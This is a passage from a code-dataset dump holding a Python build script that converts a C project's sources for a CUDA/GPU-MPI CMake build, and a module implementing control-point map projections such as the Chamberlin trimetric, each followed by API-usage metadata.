"usage_type": "call"}, 
{"api_name": "pipeline.utils.tools.JobConfig", "line_number": 87, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 130, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "71521286247", "text": "#!/usr/bin/env python\n\nimport json\nimport subprocess\nimport os\nimport re\nimport shutil\nimport textwrap\n\n# this variable is assigned by cmake during build\nGPU_MPI_BUILD_TYPE = \"@CMAKE_BUILD_TYPE@\"\n\n\ndef is_inside(path, directory):\n path = os.path.realpath(path)\n directory = os.path.realpath(directory)\n return directory == os.path.commonpath([directory, path])\n\ndef escape_name(name):\n return name.replace('/', '_').replace('.', '_')\n\n\nheader_pattern = re.compile('#include [<\"](.*)[\">]')\n\ndef find_headers(path_to_file, include_dirs):\n \"\"\" Looks for header inside include_dirs and header local directory.\n Returns list of detected headers.\n \"\"\"\n\n file_dir = os.path.dirname(os.path.realpath(__file__))\n\n # we should search relative headers in current dir\n all_include_dirs = [file_dir] + include_dirs\n\n detected_headers = []\n with open(path_to_file, 'r') as f:\n for match in header_pattern.finditer(f.read()):\n header_name = match.group(1)\n\n # search relative headers in include dirs and detect their absolute location\n absolute_header = None\n if not os.path.isabs(header_name):\n for include_dir in all_include_dirs:\n header_candidate = os.path.join(include_dir, header_name)\n if os.path.exists(header_candidate):\n absolute_header = os.path.realpath(header_candidate)\n break\n\n # if nothing is find, then it is system header that should be skipped\n if absolute_header is None:\n continue\n\n detected_headers.append(absolute_header)\n\n all_headers = detected_headers\n \n # for each detected header we need to look for other includes recurrently\n for header in detected_headers:\n all_headers += find_headers(header, include_dirs)\n\n # return each header once\n all_headers = list(set(all_headers))\n\n return all_headers\n\ndef get_includes(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['project_include_dirs']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef get_definitions(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['definitions']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef run_build():\n os.makedirs('./gpumpi_build', exist_ok=True)\n process = subprocess.Popen(f\"cmake .. 
-DCMAKE_BUILD_TYPE={GPU_MPI_BUILD_TYPE}\".split(), cwd='./gpumpi_build')\n process.wait()\n process = subprocess.Popen(\"cmake --build ./gpumpi_build\".split())\n process.wait()\n\nif __name__ == '__main__':\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n project_dir = os.getcwd()\n\n def run_cmd(command, directory):\n process = subprocess.Popen(command, cwd=directory)\n process.wait()\n if process.returncode != 0:\n raise Exception(\"failed\")\n\n with open('compile_commands.json', 'r') as f:\n compile_commands = json.load(f)\n\n\n all_sources = []\n all_headers = []\n\n for entry in compile_commands:\n # detect include directories inside project dir for each target\n entry['project_include_dirs'] = []\n for arg in entry['arguments']:\n # detect only include directories\n if not arg.startswith('-I'):\n continue\n\n include_dir = arg[2:]\n\n # make all paths absolute\n if not os.path.isabs(include_dir):\n include_dir = os.path.realpath(os.path.join(entry['directory'], include_dir))\n\n # skip includes outside of project directory\n if not is_inside(include_dir, project_dir):\n continue \n\n entry['project_include_dirs'].append(include_dir)\n\n # detect definitions\n entry['definitions'] = []\n for arg in entry['arguments']:\n if arg.startswith('-D'):\n entry['definitions'].append(arg[2:])\n\n\n # detect absolute path to source files\n entry['absolute_source_path'] = os.path.realpath(os.path.join(entry['directory'], entry['file']))\n\n # detect list of headers inside project directory that are used from source files \n all_headers += find_headers(entry['absolute_source_path'], entry['project_include_dirs'])\n all_sources += [entry['absolute_source_path']]\n\n # mention sources and headers only once\n all_sources = list(set(all_sources))\n all_headers = list(set(all_headers))\n\n # create \".cuh\" for very simple headers, because libtooling skips them\n for header in all_headers:\n expected_name = header + '.cuh'\n if not os.path.exists(expected_name):\n shutil.copyfile(header, expected_name)\n\n # add to each include in '.cu' or '.cuh' file additional '.cuh' suffix\n for file_name in (*all_sources, *all_headers):\n\n if file_name in all_sources:\n cu_file_name = file_name + '.cu'\n else:\n cu_file_name = file_name + '.cuh'\n\n with open(cu_file_name, 'r') as in_file: \n text = re.sub('#include ([<\"])(.*)([\">])', '#include \\g<1>\\g<2>.cuh\\g<3>', in_file.read())\n text = re.sub('\\.cuh\\.cuh', '.cuh', text) # fixes double modification\n with open(cu_file_name, 'w') as out_file:\n out_file.write(text)\n\n\n # for each source file detect if __gpu_main present. 
If yes, it will define an executable,\n # otherwise, it will define a library.\n executables = []\n libraries = []\n for file_name in all_sources:\n cu_file_name = file_name + '.cu'\n with open(cu_file_name, 'r') as f:\n if '__gpu_main' in f.read():\n executables.append(file_name)\n else:\n libraries.append(file_name)\n\n cmakelists = textwrap.dedent(f\"\"\"\n cmake_minimum_required(VERSION 3.12)\n project(examples LANGUAGES C CXX CUDA)\n\n set(CMAKE_CUDA_FLAGS_DEBUG \"${{CMAKE_CUDA_FLAGS_DEBUG}} -G\") \n\n # specify cuda architectures for newer cmake\n set(CMAKE_CUDA_ARCHITECTURES 60 61 70)\n\n # specify cuda architectures for older cmake\n set(CMAKE_CUDA_FLAGS\n \"${{CMAKE_CUDA_FLAGS}} \\\n -gencode arch=compute_60,code=sm_60 \\\n -gencode arch=compute_61,code=sm_61 \\\n -gencode arch=compute_70,code=sm_70\")\n\n include({script_dir}/../gpu_libs-exports.cmake)\n\n set(CMAKE_CUDA_SEPARABLE_COMPILATION ON)\n \"\"\")\n\n for f in all_sources:\n includes = get_includes(f, compile_commands)\n defines = get_definitions(f, compile_commands)\n escaped_name = escape_name(f)\n target_type = 'executable' if f in executables else 'library'\n\n cmakelists += textwrap.dedent(f\"\"\"\n add_{target_type}(target_{escaped_name} {f}.cu)\n target_link_libraries(target_{escaped_name} PRIVATE gpu_libs)\n \"\"\")\n\n if includes:\n includes_str = \" \".join(includes)\n cmakelists += textwrap.dedent(f\"\"\"\n target_include_directories(target_{escaped_name} PRIVATE {includes_str})\n \"\"\")\n\n for lib in libraries:\n for exe in executables:\n escaped_lib_name = escape_name(lib)\n escaped_exe_name = escape_name(exe)\n cmakelists += textwrap.dedent(f\"\"\"\n target_link_libraries(target_{escaped_exe_name} PRIVATE target_{escaped_lib_name})\n \"\"\")\n\n with open('CMakeLists.txt', 'w') as f:\n f.write(cmakelists)\n\n run_build()\n\n", "repo_name": "maerhart/dphpc-project", 
"call"}, {"api_name": "subprocess.Popen", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 87, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 88, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 145, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 156, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 157, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 174, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 201, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 208, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 216, "usage_type": "call"}]}
+{"seq_id": "40325099948", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 31 13:38:02 2019\n\n@author: brsr\n\"\"\"\nimport pyproj\nimport warnings\nimport numpy as np\nfrom abc import ABC\nfrom scipy.optimize import minimize\n\nfrom .transformations import Transformation, UnitVector\nfrom .helper import sqrt, antipode_v, central_angle, trigivenlengths, triangle_solid_angle\n\n#TODO:\n#vectorize all the things, or convert to \n#make a better implementation of conformal\n\n#arange3 = np.arange(3)\n#FIRST AXIS IS SPATIAL\n\n_unitsphgeod = pyproj.Geod(a=1, b=1)\n\nclass Double(Transformation):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, proj1, proj2, t=0.5):\n subproj = [proj1, proj2]\n super().__init__()\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, x, y):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].inv_transform(x, y)\n + t*subproj[1].inv_transform(x, y))\n\nclass Multiple(Transformation):\n \"\"\"Linear combination of several projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, subproj, t):\n super().__init__()\n assert len(subproj) == len(t)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.transform(lon, lat)\n return rx\n\n def inv_transform(self, x, y):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.inv_transform(x, y)\n return rx\n \nclass CtrlPtsProjection(Transformation, ABC):\n \"\"\"Subclass for any map projection that uses (2 or more) control points.\"\"\"\n def __init__(self, ctrlpts, geod = _unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 or 2x4 Numpy array, latitude and longitude of\n each control point\n geod= a pyproj.Geod object. 
For a unit sphere use\n pyproj.Geod(a=1,b=1)\n \"\"\"\n n = ctrlpts.shape[1]\n if self.nctrlpts != n:\n raise ValueError(\n 'ctrlpts has wrong number of points for this projection')\n self.geod = geod\n #it's possible to get a geod where this would give the wrong answer,\n #but I think it would have to be really weird\n area, _ = geod.polygon_area_perimeter([0,120,-120],[0,0,0])\n self.totalarea = 2*area\n\n self.ctrlpts = ctrlpts\n ctrlpts_v = UnitVector.transform_v(ctrlpts)\n self.ctrlpts_v = ctrlpts_v\n center_v = ctrlpts_v.sum(axis=1)\n self.center_v = center_v / np.linalg.norm(center_v)\n self.center = UnitVector.invtransform_v(center_v)\n antipode = antipode_v(ctrlpts)\n self.antipode = antipode\n self.antipode_v = UnitVector.transform_v(antipode)\n self.sa = 0\n if self.nctrlpts > 2:\n faz, baz, sides = self.geod.inv(ctrlpts[0], ctrlpts[1],\n np.roll(ctrlpts[0], -1),\n np.roll(ctrlpts[1], -1))\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.ctrl_angles = (faz - np.roll(baz, 1))%360\n area, _ = geod.polygon_area_perimeter(*ctrlpts)\n self.area = area\n self.ca = central_angle(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1))\n for i in range(1, self.nctrlpts-1):\n self.sa += triangle_solid_angle(ctrlpts_v[..., 0],\n ctrlpts_v[..., i],\n ctrlpts_v[..., i+1])\n\n self.edgenormals = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1), axis=0)\n\n else:\n faz, baz, sides = self.geod.inv(ctrlpts[0,0], ctrlpts[1,0],\n ctrlpts[0,1], ctrlpts[1,1])\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.area = 0\n self.ca = central_angle(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n self.edgenormals = np.cross(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n\n self.cosca = np.cos(self.ca)\n self.sinca = np.sin(self.ca)\n\n if self.sa < 0:\n warnings.warn('control polygon is in negative orientation, '\n + 'may cause unusual results')\n\n if self.nctrlpts == 4:\n ctrlpts_v = self.ctrlpts_v\n v0 = ctrlpts_v[..., 0]\n v1 = ctrlpts_v[..., 1]\n v2 = ctrlpts_v[..., 2]\n v3 = ctrlpts_v[..., 3]\n poip1 = np.cross(np.cross(v0, v1), np.cross(v3, v2))\n poip2 = np.cross(np.cross(v0, v3), np.cross(v1, v2))\n poip = np.stack([[poip1, -poip1],\n [poip2, -poip2]]).transpose(2,0,1)\n poip = poip / np.linalg.norm(poip, axis=0)\n self.poi_v = poip\n self.poi = UnitVector.invtransform_v(poip)\n self.crossx = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -2, axis=1),\n axis=0)[..., :2]\n\n def orienttgtpts(self, tgtpts, N = (0, 90)):\n \"\"\"Orient target points so that line from 0 to the projection of N\n points up. Will fail if map projection doesn't define tgtpts.\"\"\"\n pN = self.transform(*N)\n if np.allclose(pN, [0,0]):\n raise ValueError('projection of N too close to 0')\n angle = np.arctan2(pN[0],pN[1])\n rotm = np.array([[np.cos(angle), -np.sin(angle)],\n [np.sin(angle), np.cos(angle)]])\n result = rotm @ tgtpts\n self.tgtpts = result\n\n def lune(self, lon, lat):\n \"\"\"\n Determine which lune a point or series of points lies in.\n Lune 0 is the lune with vertex at the centroid and edges passing through\n control points 0 and 1. 
Lune 1 is the same using control pts 1 and 2,\n and Lune 2 uses control pts 2 and 0.\n \"\"\"\n #inexact on ellipsoids but close enough\n testpt = UnitVector.transform(lon, lat)\n testpt_v = testpt.reshape(3,-1)\n ctrlpts_v = self.ctrlpts_v\n center_v = self.center_v\n cx = np.cross(center_v, ctrlpts_v, axis=0)\n sk = cx.T @ testpt_v\n sg = sk >= 0\n ind = sg & ~np.roll(sg, shift=-1, axis=0)\n result = np.argmax(ind, axis=0)\n return result.reshape(testpt.shape[1:])\n\nclass DoubleCtrlPts(CtrlPtsProjection):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, ctrlpts, proj1, proj2, t=0.5):\n subproj = [proj1(ctrlpts), proj2(ctrlpts)]\n self.nctrlpts = subproj[0].nctrlpts\n if self.nctrlpts != subproj[1].nctrlpts:\n raise ValueError('proj1 and proj2 have different # of ctrlpts')\n super().__init__(ctrlpts)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, x, y):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].inv_transform(x, y)\n + t*subproj[1].inv_transform(x, y))\n\nclass KProjection(CtrlPtsProjection):\n exact = True\n k = 1\n def extend(self, v):\n normal = self.center_v\n k = self.k\n n = np.linalg.norm(v, axis=0, keepdims=True)\n if self.exact:\n vdotc = np.tensordot(v, normal, axes=(0, 0))[np.newaxis]\n vdotv = n**2\n p = -vdotc + sqrt(1 + vdotc**2 - vdotv)\n else:\n p = 1 - n\n #print(v.shape, p.shape, normal.shape)\n return v + k*p*normal[..., np.newaxis]\n \n def transform(self, *args, **kwargs):\n return NotImplemented\n \n#%% not-polygonal projections\nclass ChambTrimetric(CtrlPtsProjection):\n \"\"\"Chamberlin trimetric projection\"\"\"\n #FIXME this implementation fails for control triangles with \n #high aspect ratios\n nctrlpts = 3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n super().__init__(ctrlpts, geod)\n self.tgtpts = trigivenlengths(self.sides)\n try:\n self.orienttgtpts(self.tgtpts)\n except ValueError:\n pass\n\n def transform(self, x, y, **kwargs):\n if hasattr(x, '__iter__'):\n raise TypeError()\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n faz = self.faz\n raz1 = (faz - f) % 360\n radsq = np.array(rad).squeeze()**2\n ctgt = tgtpts.T.copy().view(dtype=complex).squeeze()\n a = np.roll(ctgt, -1) - ctgt\n b = ctgt\n l = abs(a)\n lsq = l**2\n rsq = radsq/lsq\n ssq = np.roll(radsq, -1, axis=-1)/lsq\n x0 = (rsq - ssq + 1)/2\n y0 = sqrt(-rsq**2 + 2*rsq*(ssq + 1) - (ssq - 1)**2)/2\n y0[np.isnan(y0)] = 0\n y = np.where(raz1 > 180, -y0, y0)\n z0 = x0 +1j*y\n pts = (a * z0 + b)\n result = np.mean(pts)\n return result.real, result.imag\n\n def invtransform(self, *args, **kwargs):\n return NotImplemented\n\nclass LstSqTrimetric(ChambTrimetric):\n \"\"\"Least-squares variation of the Chamberlin trimetric projection\"\"\"\n def transform(self, x, y, **kwargs):\n init = super().transform(x, y)\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n def objective(v):\n x = v[0]\n y = v[1]\n a = tgtpts[0]\n b = tgtpts[1]\n xma = x-a\n ymb = y-b\n dist = np.sqrt(xma**2 + ymb**2)\n result = np.sum((dist - rad)**2 )\n f = 1 - rad/dist\n f[rad <= 0] = 1\n jac = 
2*np.array([np.sum(xma*f), np.sum(ymb*f)])\n return result, jac\n res = minimize(objective, init, jac=True,\n method = 'BFGS')\n return res.x\n\nclass LinearTrimetric(CtrlPtsProjection):\n \"\"\"The linear variation of the Chamberlin Trimetric projection.\"\"\"\n nctrlpts = 3\n matrix1 = np.array([[0,-1],\n [1,0]])\n matrix2 = np.array([[0, -1, 1],\n [1, 0, -1],\n [-1, 1, 0]])\n matrixinv1 = np.array([[-2,1,1],\n [1,-2,1],\n [1,1,-2]])*2/3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 Numpy array, latitude and longitude of each control point\n geod= a pyproj.Geod object. For a unit sphere use\n pyproj.Geod(a=1,b=1).\n \"\"\"\n super().__init__(ctrlpts, geod)\n self.radius = ((geod.a**(3/2) + geod.b**(3/2))/2)**(2/3)\n self.tgtpts = trigivenlengths(self.sides)\n self.setmat()\n # try:\n # self.orienttgtpts(self.tgtpts)\n # self.setmat()\n # except ValueError:\n # pass\n\n vctrl = self.ctrlpts_v\n self.invctrlvector = np.linalg.pinv(vctrl)\n self.invperpmatrix = self.invctrlvector @ self.invctrlvector.T\n cosrthmin = 1 / np.sqrt(self.invperpmatrix.sum())\n self.hminall = np.arccos(cosrthmin)**2\n\n def setmat(self, tgtpts=None):\n \"\"\"Set matrices that use tgtpts\"\"\"\n if tgtpts is None:\n tgtpts = self.tgtpts\n else:\n self.tgtpts = tgtpts\n tgtde = np.linalg.det(np.concatenate([tgtpts, np.ones((1,3))], axis=0))\n self.m = self.matrix1 @ tgtpts @ self.matrix2 /(2*tgtde)\n self.minv = self.matrixinv1 @ tgtpts.T\n\n def transform_v(self, pts):\n rpts = pts.reshape((2,-1)).T\n rad = []\n for x,y in rpts:\n f, b, radi = self.geod.inv(x*np.ones(3), y*np.ones(3),\n self.ctrlpts[0], self.ctrlpts[1])\n rad.append(radi)\n shape = list(pts.shape)\n shape[0] = 3\n rad = np.array(rad).T\n radsq = np.array(rad)**2\n result = self.m @ radsq\n return result.reshape(pts.shape)\n\n def invtransform_v(self, pts, n=20, stop=1E-8):\n if not self.geod.sphere:\n warnings.warn('inverse transform is approximate on ellipsoids')\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n print('k: ', k)\n #hmax = np.pi**2-np.max(k, axis=0)\n hminall = self.hminall\n h = np.where(hmin < hminall, hminall, hmin)\n print('h: ', h)\n for i in range(n):\n rsq = (k + h)\n #pos = rsq > 0\n neg = rsq < 0\n zer = rsq == 0\n c = np.where(neg, np.cosh(np.sqrt(-rsq)), np.cos(np.sqrt(rsq)))\n b = np.where(neg, np.sinh(np.sqrt(-rsq)),\n np.sin(np.sqrt(rsq)))/np.sqrt(np.abs(rsq))\n b[zer] = 1\n f = np.einsum('i...,ij,j...', c, self.invperpmatrix, c) - 1\n fprime = np.einsum('i...,ij,j...', c, self.invperpmatrix, b)\n delta = f/fprime\n h += delta\n print('delta:', delta)\n print('h: ', h)\n if np.max(np.abs(delta)) < stop:\n break\n #h = np.clip(h, hmin, hmax)\n rsq = np.clip(k + h, 0, np.pi**2)\n c = np.cos(np.sqrt(rsq))\n vector = self.invctrlvector.T @ c\n print(c)\n print(vector)\n return UnitVector.invtransform_v(vector).reshape(pts.shape)\n\n def nmforplot(self, pts, n=100):\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n hmax = np.pi**2-np.max(k, axis=0)\n h = np.linspace(hmin,hmax,100).T\n rsq = (k[..., np.newaxis] + h)\n c = np.cos(np.sqrt(rsq))\n nm = np.einsum('i...,ij,j...', c, self.invperpmatrix, c)\n\n return h, nm\n\n\n#%%\nif __name__ == \"__main__\":\n import doctest\n sup = np.testing.suppress_warnings()\n sup.filter(RuntimeWarning)\n options = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS\n with sup:\n doctest.testmod(optionflags = options)\n", "repo_name": "brsr/mapstuff", 
"sub_path": "mapstuff/projections.py", "file_name": "projections.py", "file_ext": "py", "file_size_in_byte": 14925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyproj.Geod", "line_number": 23, "usage_type": "call"}, {"api_name": "transformations.Transformation", "line_number": 25, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 50, "usage_type": "name"}, {"api_name": "transformations.Transformation", "line_number": 75, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 75, "usage_type": "name"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 95, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 98, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 99, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 99, "usage_type": "name"}, {"api_name": "helper.antipode_v", "line_number": 100, "usage_type": "call"}, {"api_name": "transformations.UnitVector.transform_v", "line_number": 102, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.roll", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 111, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 115, "usage_type": "call"}, {"api_name": "helper.triangle_solid_angle", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 122, "usage_type": "call"}, {"api_name": "helper.central_angle", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 135, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 151, "usage_type": "attribute"}, {"api_name": "transformations.UnitVector.invtransform_v", "line_number": 153, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 166, "usage_type": 
"call"}, {"api_name": "transformations.UnitVector.transform", "line_number": 178, "usage_type": "call"}, {"api_name": "transformations.UnitVector", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.cross", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.tensordot", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 225, "usage_type": "attribute"}, {"api_name": "helper.sqrt", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 231, "usage_type": "attribute"}, {"api_name": "helper.trigivenlengths", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 266, "usage_type": "call"}, {"api_name": "helper.sqrt", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 297, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 311, "usage_type": "call"}, {"api_name": "helper.trigivenlengths", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 343, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cosh", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 377, "usage_type": "call"}, {"api_name": 
